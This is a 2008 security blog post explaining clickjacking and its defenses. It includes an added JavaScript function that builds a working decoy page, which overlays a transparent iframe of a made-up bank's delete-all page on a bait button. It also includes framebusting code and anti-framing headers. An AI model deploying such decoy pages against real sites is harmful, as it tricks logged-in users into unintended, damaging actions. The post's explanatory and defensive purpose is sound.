
Clickjacking Woes

  • Posted on:October 17, 2008 at 8:18 pm
  • Posted in:Malware
  • Author:
    Jovi Umawing (Technical Communications)

Anyone who follows online security has probably heard of clickjacking by now. The term was disclosed in the last week of September and is still making the rounds. Experts have been forceful about how dangerous this new form of hijacking is, while many of us are still unsure, if not confused or complacent, about what it can actually do, why we should care about it, and how we can protect ourselves.

Clickjacking, simply put, is the theft of a user's mouse clicks. The attacker controls a malicious page and arranges it so that clicks the user makes on that page are actually delivered to links or buttons on a different site, typically one the user is already logged in to, without the user noticing.

For example, an attacker sets up Site A. Site A loads selected parts of Site B (a legitimate site the user is a member of) in an invisible frame laid over its own content. Site A is arranged so that when the user clicks what looks like an ordinary button on Site A, the click actually lands on, say, “Delete All Files” on Site B. The user, of course, has no idea.

In a more serious example, which shows how these attacks can have lasting effects once they succeed, the same trick can be used against the Flash Player Security Settings Manager to turn off security settings in Flash. (And these are just two of many possible variations.)

Regarding clickjacking, there are three significant points that should be considered:

  • Clickjacking leaves the user little or no room to avoid it, because the attacker controls how users navigate within the page, for example by making every link on a given Web page bogus. Users are free to click whichever link tempts them, but the clickjacked page still sends the click where the attacker wants it.
  • Clickjacking can use any kind of link (an image link styled as a button, or a plain text link) to lure users into clicking. The sad part is that users cannot tell on their own that they are already on a hijacked page; only Web security or reputation services can block the bad pages.
  • Lastly, and perhaps most insidious, clickjacking techniques adapt to the user's environment.

    For example, if the user’s browser has been set to block JavaScript, the attack still works: the hidden iframe that harvests the user’s clicks needs only HTML and CSS, not script.
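The decoy page described in the Site A / Site B example above, and the point that it keeps working with JavaScript blocked, as an added example (this is not code from the Trend Micro post; the hosts attacker.example and bank.example and the button coordinates are made up):

```javascript
// Added example, not code from the Trend Micro post. It assembles the decoy
// page described above: Site A (attacker.example, made up) loads Site B
// (bank.example, made up) in a fully transparent iframe positioned so that
// Site B's sensitive button sits exactly under a harmless-looking bait button.
// Nothing on the decoy page needs JavaScript; HTML and CSS alone do the work,
// which is why a script blocker on its own does not stop the attack.

// Where to place the iframe so that the target rectangle inside the victim
// page (target.x, target.y in CSS pixels, measured by the attacker in advance)
// lands exactly at the bait button's position (bait.x, bait.y).
function overlayGeometry(target, bait) {
  return { frameLeft: bait.x - target.x, frameTop: bait.y - target.y };
}

/**
 * Build the decoy page.
 *   victimUrl - the legitimate page that contains the sensitive button
 *   target    - { x, y, w, h } of that button inside victimUrl
 *   bait      - { x, y, label } of the visible bait button on the decoy page
 */
function buildClickjackPage({ victimUrl, target, bait }) {
  const { frameLeft, frameTop } = overlayGeometry(target, bait);
  return [
    '<!doctype html>',
    '<html><head><meta charset="utf-8"><title>Congratulations!</title>',
    '<style>',
    // The bait is what the user sees; it has the same size as the real button.
    `  #bait { position:absolute; left:${bait.x}px; top:${bait.y}px;`,
    `          width:${target.w}px; height:${target.h}px; z-index:1; }`,
    // The victim frame is stacked ABOVE the bait (higher z-index) but fully
    // transparent, so the user sees the bait while the browser delivers the
    // click to whatever is under the cursor inside the iframe.
    `  #victim { position:absolute; left:${frameLeft}px; top:${frameTop}px;`,
    '            width:1024px; height:768px; border:0; opacity:0; z-index:2; }',
    '</style></head><body>',
    `<button id="bait">${bait.label}</button>`,
    `<iframe id="victim" src="${victimUrl}" scrolling="no"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Example run; the URL, target rectangle and bait position are constructed.
const demoPage = buildClickjackPage({
  victimUrl: 'https://bank.example/files/delete-all',
  target: { x: 300, y: 400, w: 120, h: 30 },
  bait: { x: 200, y: 200, label: 'Claim your prize' },
});
```

Saving the returned string as an HTML file and opening it shows only the bait button; the frame is invisible but still receives the click. The opacity trick is one of several; the same effect can be had by sizing the frame to a few pixels around the target and positioning it under the cursor, which is why defenders should not rely on spotting one particular CSS pattern.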

Security researcher and WhiteHat Security CTO Jeremiah Grossman, one of the two researchers who disclosed the technique, put it this way:

Everyone, including browser vendors, Adobe (plus other plug-in vendors), website owners (framebusting code), and Web users (NoScript) all need their own solutions to assist in case the others don’t do enough or anything at all.
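The framebusting code that Grossman says website owners should deploy, as an added example (not code from the post or from WhiteHat Security; bank.example and attacker.example are made-up hosts):

```javascript
// Added example, not code from the post or from WhiteHat Security. It shows
// framebusting in the form that survives the known bypasses of the 2008-era
// one-liner `if (top != self) top.location = self.location;` (a hostile parent
// page can cancel that navigation and leave the page framed). Here the page is
// hidden by default and only revealed once the script has confirmed it is the
// top-level window, so a blocked escape leaves nothing clickable.

const FRAMEBUSTER_SNIPPET = `
<style id="antiClickjack">html { display: none !important; }</style>
<script>
  if (self === top) {
    var s = document.getElementById('antiClickjack');
    s.parentNode.removeChild(s);          // not framed: reveal the page
  } else {
    top.location = self.location;         // framed: escape to the top
  }
</script>`;

// The same decision written over a window-like object so it can be exercised
// outside a browser. Returns what it did.
function framebust(win) {
  if (win.self === win.top) {
    win.hidden = false;                   // reveal the page
    return 'revealed';
  }
  win.top.location = win.self.location;   // break out of the frame
  return 'busted';
}

// Response headers that make the browser refuse framing before any script
// runs. These arrived after this post was written (X-Frame-Options shipped
// with IE8 in 2009, CSP frame-ancestors later) and are the control to rely on
// today; the script above is the fallback for clients that ignore them.
function antiFramingHeaders(allowSameOrigin) {
  return allowSameOrigin
    ? { 'X-Frame-Options': 'SAMEORIGIN', 'Content-Security-Policy': "frame-ancestors 'self'" }
    : { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': "frame-ancestors 'none'" };
}

// Constructed stand-ins for a top-level window and for a page framed by
// attacker.example, used to show both branches.
const standalone = { location: 'https://bank.example/account' };
standalone.self = standalone;
standalone.top = standalone;

const hostileParent = { location: 'https://attacker.example/prize' };
const framed = { location: 'https://bank.example/files/delete-all' };
framed.self = framed;
framed.top = hostileParent;
```

One caveat the script-only approach carries: a visitor with JavaScript disabled never gets the page revealed, so the snippet must be paired with the headers rather than used alone.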

Robert “RSnake” Hansen, who disclosed clickjacking together with Grossman, recommends that users enable the “Plugins|Forbid IFRAME” setting and install the NoScript add-on as a good defensive combination against clickjacking attacks. NoScript, a Firefox add-on, introduced a feature called ClearClick, which detects a mouse click or keystroke that is about to land on a hidden or obscured element, stops the interaction from completing, and reveals what the user was really about to act on.

At that point, the user can check whether the click target was really the intended one and decide to keep it locked or to unlock it for normal interaction.

IMPORTANT: Adobe issued a workaround for this critical security issue. The solution can be found on Adobe’s Security Advisories page.
